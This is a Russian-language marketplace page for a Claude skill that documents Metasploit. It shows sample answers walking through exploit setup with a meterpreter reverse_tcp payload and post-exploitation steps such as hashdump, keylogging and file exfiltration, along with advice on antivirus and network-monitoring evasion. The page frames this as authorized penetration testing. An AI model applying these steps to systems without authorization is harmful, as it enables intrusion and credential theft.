Навыки metasploit-framework
🔒

metasploit-framework

Средний риск ⚙️ Внешние команды🌐 Доступ к сети📁 Доступ к файловой системе

Мастер тестирования на проникновение с Metasploit и Claude

Специалистам по безопасности необходима экспертная поддержка для авторизованного тестирования на проникновение. Этот навык предоставляет исчерпывающую документацию по Metasploit Framework, охватывающую эксплуатацию уязвимостей, генерацию полезных нагрузок и действия после получения доступа с лучшими практиками соблюдения законодательства.

Поддерживает: Claude Codex Code(CC)
⚠️ 63 Плохо
1

Скачать ZIP навыка

2

Загрузить в Claude

Перейдите в Settings → Capabilities → Skills → Upload skill

3

Включите и начните использовать

Протестировать

Использование «metasploit-framework». Как мне запустить msfconsole и искать эксплойты SMB?

Ожидаемый результат:

Для запуска msfconsole и поиска эксплойтов SMB: Запустите консоль командой 'msfconsole -q' для тихого режима, затем используйте 'search type:exploit smb' для поиска модулей эксплойтов, связанных с SMB. Также можно искать конкретно с 'search eternalblue' для эксплойта уязвимости MS17-010 SMB. Просмотрите детали модуля с 'info [module_name]' перед выбором.

Использование «metasploit-framework». Каковы шаги для конфигурации и запуска эксплойта с полезной нагрузкой meterpreter?

Ожидаемый результат:

Настройте эксплойт за шесть шагов: Сначала используйте 'use [module_path]' для выбора эксплойта. Выполните 'show options' для просмотра требуемых настроек. Установите параметры цели с 'set RHOSTS [target_ip]' и 'set RPORT [port]'. Выберите полезную нагрузку с 'set PAYLOAD windows/x64/meterpreter/reverse_tcp'. Настройте listener с 'set LHOST [your_ip]' и 'set LPORT [port]'. Наконец, выполните с 'exploit' для попытки компрометации и установления сессии Meterpreter.

Использование «metasploit-framework». Какие команды Meterpreter мне следует использовать после получения сессии?

Ожидаемый результат:

После установления сессии Meterpreter выполните 'sysinfo' и 'getuid' для понимания уровня доступа. Используйте 'hashdump' для извлечения хешей паролей и 'ps' для просмотра запущенных процессов. Выполните 'migrate [PID]' для перемещения в более стабильный процесс. Для эксфильтрации данных используйте 'download [file]' или 'upload [file]'. Выполните 'screenshot' для захвата рабочего стола или 'keyscan_start' для начала логирования нажатий клавиш. Фоновой командой 'background' вернитесь в msfconsole.

Аудит безопасности

Средний риск
v1 • 2/25/2026

This skill provides documentation for the Metasploit Framework, a legitimate penetration testing tool used by security professionals. All detected patterns are educational examples showing authorized security testing workflows. The skill includes appropriate legal disclaimers emphasizing written authorization requirements. While it documents offensive security capabilities that could be misused, the context clearly indicates professional security assessment purposes with proper legal safeguards.

1
Просканировано файлов
484
Проанализировано строк
7
находки
1
Всего аудитов
Проблемы среднего риска (1)
SKILL.md:1-484
Documentation of Offensive Security Tools
This skill provides comprehensive documentation for Metasploit Framework, a penetration testing tool that can be used for both authorized security testing and malicious activities. The content includes exploit modules, payload generation, post-exploitation techniques (credential harvesting, keylogging, screenshots), and persistence mechanisms. While the skill includes legal disclaimers emphasizing written authorization requirements, the detailed technical documentation could be misused by unauthorized actors.
Проблемы низкого риска (3)
SKILL.md:20-30SKILL.md:56-171SKILL.md:340-395
Bash Command Examples in Documentation
The skill contains numerous bash command examples showing Metasploit usage (msfconsole, msfvenom, meterpreter commands). These are educational documentation examples, not executable code. Risk is low as these require manual execution by a user who should already have authorization for penetration testing activities.
SKILL.md:146SKILL.md:158SKILL.md:263
Example IP Addresses in Documentation
The skill uses example IP addresses (192.168.x.x private ranges) for demonstration purposes. These are standard documentation examples and do not represent hardcoded targets.
SKILL.md:238-242SKILL.md:308-334
Post-Exploitation Capability Documentation
The skill documents Meterpreter capabilities including keylogging, screenshots, credential harvesting, and file operations. These are descriptions of legitimate penetration testing tool capabilities used during authorized security assessments, not implementations of malicious functionality.

Факторы риска

⚙️ Внешние команды (4)
SKILL.md:20-30 SKILL.md:56-73 SKILL.md:340-373 SKILL.md:379-395
🌐 Доступ к сети (3)
SKILL.md:146 SKILL.md:228 SKILL.md:263
📁 Доступ к файловой системе (1)
SKILL.md:216-217
Проверено: claude

Оценка качества

38
Архитектура
100
Сопровождаемость
87
Контент
31
Сообщество
54
Безопасность
91
Соответствие спецификации

Что вы можете построить

Руководство по рабочему процессу тестирования на проникновение

Специалисты по безопасности используют этот навык во время авторизованных engagements по тестированию на проникновение для навигации по возможностям Metasploit Framework, выбора подходящих модулей эксплойтов, конфигурации полезных нагрузок и проведения действий после получения доступа в рамках legal scope.

Документация оценки безопасности

Участники Red team используют этот навык для документирования использования Metasploit в отчётах об оценке безопасности, обеспечивая точную запись правильного синтаксиса команд, выбора модулей и действий после получения доступа для клиентских deliverables.

Образовательный ресурс для обучения безопасности

Студенты в области кибербезопасности и кандидаты на сертификацию используют этот навык для изучения концепций Metasploit Framework, отработки рабочих процессов тестирования на проникновение в лабораторных средах и подготовки к сертификациям, таким как OSCP, CEH и PTX.

Попробуйте эти промпты

Базовый поиск и выбор модуля 
Как мне искать и выбрать подходящий модуль эксплойта Metasploit для Windows-цели с уязвимостями SMB?
Конфигурация и выполнение эксплойта 
Проведите меня через конфигурацию эксплойта eternalblue с полезной нагрузкой meterpreter reverse_tcp, включая установку RHOSTS, LHOST и требуемых опций.
Пост-эксплуатация с Meterpreter 
После установления сессии Meterpreter, какие команды мне следует использовать для перечисления целевой системы, сбора учётных данных и поддержания постоянства доступа во время авторизованного тестирования на проникновение?
Генерация полезной нагрузки с msfvenom 
Сгенерируйте команду msfvenom для создания исполняемой полезной нагрузки Windows с обратным TCP-соединением, включая кодирование для обхода обнаружения антивирусом.

Лучшие практики

  • Всегда получайте письменное разрешение перед проведением любых действий по тестированию на проникновение с Metasploit
  • Сначала используйте команду 'check' для проверки уязвимости цели перед запуском эксплойтов для минимизации нарушений
  • Тестируйте полезные нагрузки в изолированных лабораторных средах перед развёртыванием на производственных целях оценки
  • Документируйте все команды, результаты и находки для включения в отчёты о тестировании на проникновение
  • Используйте зашифрованные полезные нагрузки reverse_https вместо reverse_tcp, когда возможно, для обхода сетевого мониторинга
  • Немедленно переводите сессии в фоновый режим и мигрируйте процессы для поддержания стабильности доступа

Избегать

  • Не используйте эксплойты Metasploit на системах без явного письменного разрешения — это незаконно
  • Избегайте последовательного запуска всех эксплойтов против целей без надлежащей разведки и проверки уязвимостей
  • Никогда не используйте производственные системы или публичные IP-адреса в примерах команд во время документации или обучения
  • Не оставляйте активные сессии Meterpreter без присмотра и не забывайте правильно закрывать их после оценок
  • Избегайте использования некодированных полезных нагрузок, которые легко обнаруживаются антивирусом, без предварительного тестирования техник обхода

Часто задаваемые вопросы

Является ли использование Metasploit Framework законным?
Да, Metasploit является легитимным инструментом тестирования на проникновение, используемым специалистами по безопасности по всему миру. Однако использование его против систем, которыми вы не владеете или без письменного разрешения, является незаконным. Всегда убедитесь, что у вас есть надлежащее юридическое разрешение и задокументированные правила взаимодействия перед проведением любого тестирования безопасности.
В чём разница между msfconsole и msfvenom?
msfconsole — это основной интерфейс Metasploit Framework для запуска эксплойтов, управления сессиями и проведения действий пост-эксплуатации. msfvenom — это автономный инструмент генерации полезных нагрузок, который создаёт пользовательские исполняемые файлы, скрипты и шеллкод для различных платформ без необходимости полного интерфейса консоли.
Почему мои эксплойты не работают или сессии немедленно завершаются?
Распространённые причины включают обнаружение антивирусом, несовместимую архитектуру полезной нагрузки, блокировку обратных соединений брандмауэром или сбой целевого процесса. Решения включают использование кодированных полезных нагрузок, соответствие архитектуры полезной нагрузки целевой ОС, немедленную миграцию в стабильные процессы и использование бесэтапных полезных нагрузок для более надёжных соединений.
Каковы различные типы полезных нагрузок в Metasploit?
Metasploit имеет три категории полезных нагрузок: Singles — это автономные полезные нагрузки, которые выполняются независимо. Stagers — это небольшие начальные полезные нагрузки, которые загружают и выполняют более крупную stage. Stages — это полнофункциональные полезные нагрузки, загружаемые stagers, предоставляющие полную функциональность, такую как Meterpreter. Соглашение об именовании следует формату platform/architecture/type/connection.
Как обойти обнаружение антивирусом с полезными нагрузками Metasploit?
Используйте множественные итерации кодирования с флагом -e и параметром -i для обфускации полезных нагрузок. Рассмотрите использование модулей уклонения, пользовательских шаблонов полезных нагрузок или альтернативных типов полезных нагрузок, таких как reverse_https. Для продвинутого уклонения может потребоваться создание пользовательских загрузчиков шеллкода или использование сторонних фреймворков генерации полезных нагрузок вместе с Metasploit.
Может ли этот навык выполнять команды Metasploit напрямую через Claude или Claude Code?
Нет, этот навык предоставляет документацию и руководства для Metasploit Framework, но не выполняет команды напрямую. У вас должен быть установлен Metasploit на вашей системе, и вы должны запускать команды через ваш терминал. Навык помогает понять правильный синтаксис, выбор модулей, конфигурацию и рабочие процессы устранения неполадок.

Сведения для разработчиков

Автор

sickn33

Лицензия

MIT

Репозиторий

https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/metasploit-framework

Ссылка

main

Структура файлов

📄 SKILL.md